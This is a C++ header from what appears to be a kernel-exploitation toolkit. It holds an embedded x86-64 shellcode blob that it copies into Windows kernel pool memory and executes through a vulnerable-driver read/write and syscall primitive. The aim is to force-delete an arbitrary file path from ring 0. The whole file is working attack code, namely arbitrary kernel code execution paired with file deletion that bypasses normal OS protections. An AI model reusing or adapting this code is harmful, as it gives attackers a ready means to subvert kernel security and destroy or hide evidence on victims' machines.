#pragma once
#include <cstddef>
#include <cstdint>
#include <mutex>

#include "vdm_ctx/vdm_ctx.hpp"
namespace fdelete
{
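// Table of ntoskrnl export addresses handed to the embedded routine as its
// first argument. The machine code in `shellcode` below reads these slots
// through fixed byte offsets from the struct base (for example the
// `FF 53 28` bytes call through the sixth slot), so member order, pointer
// size and total size are part of that routine's ABI. The static_asserts
// after the definition pin the layout so an accidental reorder or insertion
// fails at compile time instead of dereferencing the wrong slot in ring 0.
typedef struct _import_struct_t
{
    void* ObReferenceObjectByHandlePtr;           // slot 0, offset 0x00
    void* ObfDereferenceObjectPtr;                // slot 1, offset 0x08
    void* ZwClosePtr;                             // slot 2, offset 0x10
    void* IoCreateFileSpecifyDeviceObjectHintPtr; // slot 3, offset 0x18
    void* ZwDeleteFilePtr;                        // slot 4, offset 0x20
    void* RtlInitUnicodeStringPtr;                // slot 5, offset 0x28
} import_struct_t, *pimport_struct_t;

// The embedded routine is REX-prefixed x86-64 code, so 8-byte slots are the
// only layout it can address correctly.
static_assert(sizeof(void*) == 8,
    "fdelete::shellcode is x86-64 only; import_struct_t slots must be 8 bytes");
static_assert(sizeof(import_struct_t) == 6 * sizeof(void*),
    "import_struct_t must be six tightly packed pointers (shellcode ABI)");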
// Calling convention of the embedded routine: first argument is the import
// table, second the wide-char path; the NTSTATUS it returns is compared
// against STATUS_SUCCESS in remove().
using entry_delete_t = NTSTATUS(*)(pimport_struct_t, const wchar_t* image_path);
// ExAllocatePool as invoked through vdm->syscall: (pool type as a 16-bit
// value, byte count) -> base address, or null on failure.
using ex_allocate_t = void* (*)(std::uint16_t, std::size_t);
// ExFreePool as invoked through vdm->syscall. The kernel export itself returns
// VOID; the bool here is presumably what the syscall wrapper yields — confirm.
using ex_free_t = bool(*)(void*);
// x86-64 machine code for
//     NTSTATUS EntryDelete(PIMPORT_STRUCT Imports, PWCHAR ImagePath)
// built outside this repository and embedded as raw bytes, so it cannot be
// audited, rebuilt or stepped through from this source file. It reaches its
// kernel dependencies through fixed offsets into the import_struct_t passed
// in the first argument (e.g. `FF 53 28` calls the sixth slot), which couples
// this blob to that struct's layout. The array is left non-const, presumably
// because the write primitive that copies it takes a non-const source —
// confirm before adding const. The 275 length must match the initializer.
inline unsigned char shellcode[275] =
{
    0x48, 0x89, 0x5C, 0x24, 0x10, 0x55, 0x48, 0x8D, 0x6C, 0x24, 0xA9, 0x48,
    0x81, 0xEC, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x67, 0x00, 0x48,
    0x8B, 0xD9, 0x48, 0x8D, 0x4D, 0x07, 0xFF, 0x53, 0x28, 0x48, 0x83, 0x64,
    0x24, 0x70, 0x00, 0x48, 0x8D, 0x45, 0x07, 0x48, 0x83, 0x65, 0x2F, 0x00,
    0x4C, 0x8D, 0x4D, 0x17, 0xC7, 0x44, 0x24, 0x68, 0x00, 0x08, 0x00, 0x00,
    0x4C, 0x8D, 0x45, 0x27, 0x48, 0x83, 0x64, 0x24, 0x60, 0x00, 0x48, 0x8D,
    0x4D, 0x77, 0x83, 0x64, 0x24, 0x58, 0x00, 0x0F, 0x57, 0xC0, 0x83, 0x64,
    0x24, 0x50, 0x00, 0xBA, 0x81, 0x01, 0x10, 0x00, 0x48, 0x83, 0x64, 0x24,
    0x48, 0x00, 0xC7, 0x44, 0x24, 0x40, 0x60, 0x00, 0x00, 0x00, 0xC7, 0x44,
    0x24, 0x38, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x30, 0x07, 0x00,
    0x00, 0x00, 0x83, 0x64, 0x24, 0x28, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20,
    0x00, 0x48, 0x89, 0x45, 0x37, 0x48, 0x8B, 0x43, 0x18, 0x0F, 0x11, 0x45,
    0x17, 0xC7, 0x45, 0x27, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x45, 0x3F, 0x40,
    0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x45, 0x47, 0xFF, 0xD0, 0x85, 0xC0,
    0x75, 0x58, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x48, 0x8D, 0x4D, 0x67,
    0x48, 0x8B, 0x03, 0x45, 0x33, 0xC9, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x45,
    0x33, 0xC0, 0x48, 0x8B, 0x4D, 0x77, 0x33, 0xD2, 0xFF, 0xD0, 0x85, 0xC0,
    0x75, 0x34, 0x48, 0x8B, 0x45, 0x67, 0x48, 0x8B, 0x48, 0x28, 0x48, 0x83,
    0x61, 0x10, 0x00, 0x48, 0x8D, 0x4D, 0x27, 0x48, 0x8B, 0x45, 0x67, 0xC6,
    0x40, 0x4C, 0x01, 0x48, 0x8B, 0x43, 0x20, 0xFF, 0xD0, 0x85, 0xC0, 0x75,
    0x11, 0x48, 0x8B, 0x4D, 0x67, 0xFF, 0x53, 0x08, 0x48, 0x8B, 0x43, 0x10,
    0x48, 0x8B, 0x4D, 0x77, 0xFF, 0xD0, 0x48, 0x8B, 0x9C, 0x24, 0xE8, 0x00,
    0x00, 0x00, 0x48, 0x81, 0xC4, 0xD0, 0x00, 0x00, 0x00, 0x5D, 0xC3
};
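/// Runs the embedded EntryDelete routine against @p image_path through the
/// vdm primitive: resolves the ntoskrnl exports it needs, copies the routine
/// into a pool allocation, invokes it, and frees the allocation.
///
/// @param vdm        Context providing wkm() and syscall<>(); must not be null.
/// @param image_path Wide-char path forwarded unchanged to the routine; must
///                   not be null.
/// @return true only when the routine returned STATUS_SUCCESS; false when an
///         argument is null, any required export or the pool allocation could
///         not be obtained, or the routine reported failure.
///
/// Marked `inline` because this function is defined in a header: the previous
/// non-inline definition was an ODR violation (duplicate symbol) as soon as
/// two translation units included the file.
inline auto remove(vdm::vdm_ctx* vdm, const wchar_t* image_path) -> bool
{
    if (vdm == nullptr || image_path == nullptr)
        return false;

    // Resolved once per process. get_kmodule_export is assumed to yield a
    // null/zero value for an export it cannot find — TODO confirm against util.
    static const auto ex_allocate_pool =
        util::get_kmodule_export("ntoskrnl.exe", "ExAllocatePool");
    static const auto ex_free_pool =
        util::get_kmodule_export("ntoskrnl.exe", "ExFreePool");

    static import_struct_t imports{};
    static std::once_flag once;
    // Capture list is empty on purpose: `imports` is a function-level static,
    // so the previous `[&]` captured nothing.
    std::call_once(once, []() -> void
    {
        imports.IoCreateFileSpecifyDeviceObjectHintPtr =
            util::get_kmodule_export("ntoskrnl.exe", "IoCreateFileSpecifyDeviceObjectHint");
        imports.ObfDereferenceObjectPtr =
            util::get_kmodule_export("ntoskrnl.exe", "ObfDereferenceObject");
        imports.ObReferenceObjectByHandlePtr =
            util::get_kmodule_export("ntoskrnl.exe", "ObReferenceObjectByHandle");
        imports.RtlInitUnicodeStringPtr =
            util::get_kmodule_export("ntoskrnl.exe", "RtlInitUnicodeString");
        imports.ZwClosePtr =
            util::get_kmodule_export("ntoskrnl.exe", "ZwClose");
        imports.ZwDeleteFilePtr =
            util::get_kmodule_export("ntoskrnl.exe", "ZwDeleteFile");
    });

    // Every slot is called through by the machine code; a null entry would
    // fault in ring 0 and bugcheck the machine, so refuse to run instead.
    if (!ex_allocate_pool || !ex_free_pool ||
        !imports.ObReferenceObjectByHandlePtr ||
        !imports.ObfDereferenceObjectPtr ||
        !imports.ZwClosePtr ||
        !imports.IoCreateFileSpecifyDeviceObjectHintPtr ||
        !imports.ZwDeleteFilePtr ||
        !imports.RtlInitUnicodeStringPtr)
        return false;

    // Pool type 0, the same value the original passed as NULL; spelled as the
    // parameter's own type so the syscall wrapper sees a std::uint16_t.
    constexpr std::uint16_t pool_type = 0;
    const auto shellcode_base =
        vdm->syscall<ex_allocate_t>(ex_allocate_pool, pool_type, sizeof shellcode);
    // ExAllocatePool can return null under pressure; the original then wrote
    // to and called address 0.
    if (!shellcode_base)
        return false;

    vdm->wkm(shellcode_base, shellcode, sizeof shellcode);

    const auto result =
        vdm->syscall<entry_delete_t>(shellcode_base, &imports, image_path);

    // Free regardless of the routine's outcome so the pool block never leaks.
    vdm->syscall<ex_free_t>(ex_free_pool, shellcode_base);
    return result == STATUS_SUCCESS;
}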
} |